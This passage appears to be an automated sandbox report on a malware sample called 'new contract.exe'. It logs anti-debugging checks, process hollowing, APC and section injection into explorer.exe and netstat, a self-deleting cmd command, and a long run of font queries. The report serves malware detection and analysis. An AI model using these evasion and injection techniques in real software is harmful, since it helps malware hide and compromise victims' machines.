Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01646962 mov eax, dword ptr fs:[00000030h] 2_2_01646962
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01646962 mov eax, dword ptr fs:[00000030h] 2_2_01646962
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01646962 mov eax, dword ptr fs:[00000030h] 2_2_01646962
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0166096E mov eax, dword ptr fs:[00000030h] 2_2_0166096E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0166096E mov edx, dword ptr fs:[00000030h] 2_2_0166096E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0166096E mov eax, dword ptr fs:[00000030h] 2_2_0166096E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C4978 mov eax, dword ptr fs:[00000030h] 2_2_016C4978
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C4978 mov eax, dword ptr fs:[00000030h] 2_2_016C4978
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AC97C mov eax, dword ptr fs:[00000030h] 2_2_016AC97C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A0946 mov eax, dword ptr fs:[00000030h] 2_2_016A0946
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F4940 mov eax, dword ptr fs:[00000030h] 2_2_016F4940
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A892A mov eax, dword ptr fs:[00000030h] 2_2_016A892A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B892B mov eax, dword ptr fs:[00000030h] 2_2_016B892B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E908 mov eax, dword ptr fs:[00000030h] 2_2_0169E908
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169E908 mov eax, dword ptr fs:[00000030h] 2_2_0169E908
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AC912 mov eax, dword ptr fs:[00000030h] 2_2_016AC912
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01618918 mov eax, dword ptr fs:[00000030h] 2_2_01618918
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01618918 mov eax, dword ptr fs:[00000030h] 2_2_01618918
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AE9E0 mov eax, dword ptr fs:[00000030h] 2_2_016AE9E0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016529F9 mov eax, dword ptr fs:[00000030h] 2_2_016529F9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016529F9 mov eax, dword ptr fs:[00000030h] 2_2_016529F9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B69C0 mov eax, dword ptr fs:[00000030h] 2_2_016B69C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0162A9D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0162A9D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0162A9D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0162A9D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0162A9D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0162A9D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016549D0 mov eax, dword ptr fs:[00000030h] 2_2_016549D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EA9D3 mov eax, dword ptr fs:[00000030h] 2_2_016EA9D3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h] 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016209AD mov eax, dword ptr fs:[00000030h] 2_2_016209AD
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016209AD mov eax, dword ptr fs:[00000030h] 2_2_016209AD
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A89B3 mov esi, dword ptr fs:[00000030h] 2_2_016A89B3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A89B3 mov eax, dword ptr fs:[00000030h] 2_2_016A89B3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A89B3 mov eax, dword ptr fs:[00000030h] 2_2_016A89B3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AE872 mov eax, dword ptr fs:[00000030h] 2_2_016AE872
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AE872 mov eax, dword ptr fs:[00000030h] 2_2_016AE872
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B6870 mov eax, dword ptr fs:[00000030h] 2_2_016B6870
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B6870 mov eax, dword ptr fs:[00000030h] 2_2_016B6870
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01632840 mov ecx, dword ptr fs:[00000030h] 2_2_01632840
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01650854 mov eax, dword ptr fs:[00000030h] 2_2_01650854
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01624859 mov eax, dword ptr fs:[00000030h] 2_2_01624859
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01624859 mov eax, dword ptr fs:[00000030h] 2_2_01624859
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01642835 mov eax, dword ptr fs:[00000030h] 2_2_01642835
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01642835 mov eax, dword ptr fs:[00000030h] 2_2_01642835
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01642835 mov eax, dword ptr fs:[00000030h] 2_2_01642835
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01642835 mov ecx, dword ptr fs:[00000030h] 2_2_01642835
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01642835 mov eax, dword ptr fs:[00000030h] 2_2_01642835
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01642835 mov eax, dword ptr fs:[00000030h] 2_2_01642835
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165A830 mov eax, dword ptr fs:[00000030h] 2_2_0165A830
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C483A mov eax, dword ptr fs:[00000030h] 2_2_016C483A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C483A mov eax, dword ptr fs:[00000030h] 2_2_016C483A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AC810 mov eax, dword ptr fs:[00000030h] 2_2_016AC810
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EA8E4 mov eax, dword ptr fs:[00000030h] 2_2_016EA8E4
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0165C8F9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0165C8F9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164E8C0 mov eax, dword ptr fs:[00000030h] 2_2_0164E8C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F08C0 mov eax, dword ptr fs:[00000030h] 2_2_016F08C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01620887 mov eax, dword ptr fs:[00000030h] 2_2_01620887
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AC89D mov eax, dword ptr fs:[00000030h] 2_2_016AC89D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161CB7E mov eax, dword ptr fs:[00000030h] 2_2_0161CB7E
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D4B4B mov eax, dword ptr fs:[00000030h] 2_2_016D4B4B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00682167 GetProcessHeap,htons,htons,InternalGetTcpTableWithOwnerModule,htons,htons,InternalGetTcpTable2,htons,htons,HeapFree,InternalGetBoundTcpEndpointTable,htons,htons,HeapFree,htons,htons,InternalGetTcp6TableWithOwnerModule,htons,htons,InternalGetTcp6Table2,htons,htons,HeapFree,InternalGetBoundTcp6EndpointTable,htons,htons,HeapFree,InternalGetUdpTableWithOwnerModule,htons,HeapFree,InternalGetUdp6TableWithOwnerModule,htons,HeapFree, 5_2_00682167
Source: C:\Users\user\Desktop\new contract.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00685DC0 SetUnhandledExceptionFilter, 5_2_00685DC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00685C30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_00685C30
Source: C:\Users\user\Desktop\new contract.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\new contract.exe NtQueueApcThread: Indirect: 0x117A4F2
Source: C:\Users\user\Desktop\new contract.exe NtClose: Indirect: 0x117A56C
Source: C:\Users\user\Desktop\new contract.exe Memory written: C:\Users\user\Desktop\new contract.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\new contract.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\new contract.exe Section loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\new contract.exe Thread register set: target process: 2580
Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 2580
Source: C:\Users\user\Desktop\new contract.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\new contract.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 680000
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: memset,OpenProcess,K32GetModuleBaseNameW,CompareStringW,CompareStringW,GetSystemDirectoryW,LoadLibraryExW,GetProcAddress,K32GetModuleBaseNameW,CloseHandle,LocalFree,FreeLibrary, svchost.exe 5_2_006838D2
Source: C:\Users\user\Desktop\new contract.exe Process created: C:\Users\user\Desktop\new contract.exe "C:\Users\user\Desktop\new contract.exe"
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\new contract.exe"
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_006858B6 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 5_2_006858B6
Source: explorer.exe, 00000003.00000000.1745096473.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.4129623359.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1743754861.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.1743468048.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
Source: explorer.exe, 00000003.00000002.4129623359.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1743754861.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000002.4129623359.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1743754861.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Users\user\Desktop\new contract.exe VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
